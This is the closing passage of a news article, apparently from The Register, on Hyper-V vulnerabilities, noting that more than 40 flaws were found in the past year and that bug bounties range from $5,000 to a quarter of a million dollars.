The duo acknowledged there are still a few bugs to be found – all code has flaws, and more than 40 have been discovered in the past year in Hyper-V. There are bounties for all kinds of vulnerabilities in the software, with rewards ranging from $5,000 up to the quarter-of-a-million jackpot, and you can check out the full list here. Good luck. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/09/hyperv_hacking/